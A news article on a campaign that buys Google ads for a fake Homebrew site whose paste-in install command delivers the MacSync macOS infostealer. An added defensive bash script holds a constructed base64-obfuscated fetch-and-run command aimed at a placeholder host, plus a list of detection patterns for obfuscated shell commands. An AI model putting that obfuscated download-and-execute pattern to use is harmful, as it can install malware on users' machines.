Hackers replace top Google result for Homebrew with a sponsored ad serving macOS malware


Clicking the first result Google shows for Homebrew, the dominant command-line package manager for macOS, can land users on a malicious page whose install command delivers the MacSync infostealer, security researchers at the SANS Internet Storm Center (ISC) warn.

Cybercriminals are running malvertising campaigns on Google Search, buying sponsored results for Homebrew (Brew) that appear above the organic search results.

Bradley Duncan, a threat researcher, discovered malicious ads for fake Homebrew circulating on April 30th, 2026.


The impostor's website is an exact replica of the original, except for the featured install command. Instead of pulling in the package manager, that command pulls in an infostealer.


“As MacBooks and Mac minis become more popular, we’re seeing more campaigns targeting these macOS hosts,” Duncan said in the report.

From the page itself, users have almost no way to tell the legitimate and fake versions of Brew apart: the only visible difference is the command they are told to paste.

The sponsored result was purchased through a legitimate Google Ads account that was most likely compromised.

Screenshot: the sponsored search result (image by isc.sans.edu)

The landing page's address also looks trustworthy, because the page is hosted on Google's own platform, Google Sites, under a sites.google.com URL. Domain-reputation checks and URL filters that trust Google's domain therefore do not flag it.


Like the original, the site tells the visitor to paste a command into the Terminal to install Homebrew. The difference is the command itself: instead of fetching Homebrew's readable install script, it carries an encoded script that decodes and runs the real payload.

If the victim copies, pastes, and runs it, the same steps as a genuine Homebrew install, they are prompted for their password and asked to grant the Terminal additional permissions, which a user might expect while installing software.

Screenshot: the fake Brew site (image by isc.sans.edu)

On screen, the process ends with an error pop-up claiming that the Mac does not support this application.
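The lure above works because the victim never reads what they paste. The script below is an added example, not code from the SANS ISC report or from the Homebrew project: it vets a copy-pasted install command for the encoded-payload pattern described here, and decodes any embedded base64 so the hidden script can be read, without ever executing the command. The legitimate Homebrew one-liner is included for comparison; the "fake" command is a constructed stand-in (the real one is in the report's IOCs), and the indicator list is my own.

```shell
#!/usr/bin/env bash
# Added example (not from the SANS ISC report or Homebrew): vet a pasted
# "install" command before running it. Nothing here executes the command.

# The genuine Homebrew one-liner: it fetches a readable script over HTTPS.
LEGIT_CMD='/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'

# Constructed stand-in for the fake site's command (NOT the real sample):
# the stage-2 fetch is hidden inside a base64 literal.
FAKE_PAYLOAD='curl -fsSL http://example.invalid/stage2 | bash'
FAKE_CMD="echo $(printf '%s' "$FAKE_PAYLOAD" | base64 | tr -d '\n') | base64 -d | bash"

# Scan a command string for obfuscation/execution indicators (regex::why).
# Prints one SUSPICIOUS line per hit; returns 0 when clean, 1 otherwise.
vet_install_cmd() {
  local cmd="$1" hits=0 p rx why
  while IFS= read -r p; do
    [ -n "$p" ] || continue
    rx="${p%%::*}"; why="${p#*::}"
    if printf '%s' "$cmd" | grep -Eq -- "$rx"; then
      printf 'SUSPICIOUS: %s\n' "$why"
      hits=$((hits + 1))
    fi
  done <<'EOF'
base64[[:space:]]+(-d|-D|--decode)::base64-decodes a hidden script
echo[[:space:]]+[A-Za-z0-9+/=]{40,}::long inline base64 literal
(^|[[:space:];&|])eval[[:space:]]::eval of a constructed string
xxd[[:space:]]+-r::hex-decodes hidden data
openssl[[:space:]]+enc[[:space:]]+-d::decrypts hidden data
[|][[:space:]]*(ba|z)?sh([[:space:]]|$)::pipes data straight into a shell (some legitimate installers do this too; read what is piped)
osascript::runs AppleScript (used for fake password prompts)
nohup[[:space:]]::starts a detached background process
EOF
  [ "$hits" -eq 0 ]
}

# Decode every long base64 literal in the command so the hidden script can be
# read. Output only; the decoded text is never executed.
reveal_base64() {
  local cmd="$1" tok
  for tok in $(printf '%s' "$cmd" | grep -Eo '[A-Za-z0-9+/]{40,}={0,2}' || true); do
    # Older macOS base64 only knew -D; newer macOS and GNU accept -d.
    printf '%s' "$tok" | base64 -d 2>/dev/null || printf '%s' "$tok" | base64 -D 2>/dev/null
    printf '\n'
  done
}

# Demo on the two samples; substitute the command you were told to paste.
for c in "$LEGIT_CMD" "$FAKE_CMD"; do
  printf '\n== %s\n' "$c"
  if vet_install_cmd "$c"; then echo "no obfuscation indicators"; fi
  reveal_base64 "$c"
done
```

The pipe-into-shell indicator deliberately fires on some legitimate installers as well; the point is to make the reader look at what is being piped, and the decoded output from the second function is what that look should start with.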

The payload that actually runs in the background is MacSync Stealer, a relatively recent and still-evolving macOS infostealer.

“During the infection, MacSync Stealer collects information from the host, temporarily saves it to /tmp/osalogging.zip, and sends that file to the C2 server,” the researcher explained.

Screenshot: MacSync Stealer (image by isc.sans.edu)

Cybernews previously reported that MacSync has many capabilities, including exfiltrating files and documents, displaying fake macOS password prompts to harvest credentials, and stealing browser data such as cookies, saved logins, and extension data.

The malware also steals data from Telegram, macOS Notes, and cryptocurrency wallets, and it often establishes persistence by replacing legitimate crypto-wallet applications such as Ledger Live or Trezor.

The malvertising campaigns are ongoing – at the beginning of 2026, Bitdefender discovered over 200 malicious ads impersonating popular Mac software on Google Search.


Duncan shares the current indicators of compromise in the report. However, cybercrooks frequently rotate flagged infrastructure, such as command-and-control (C2) domains, IP addresses, and payloads, so those IOCs go stale quickly.

Researchers recommend using an ad blocker to strip trackers and malicious ads, or at least scrolling past the sponsored results, and running security tools. Don't paste terminal commands from the web that you don't understand: a legitimate installer such as Homebrew's is a readable script, not an encoded blob, and an install command that base64-decodes or evals hidden data is a red flag.

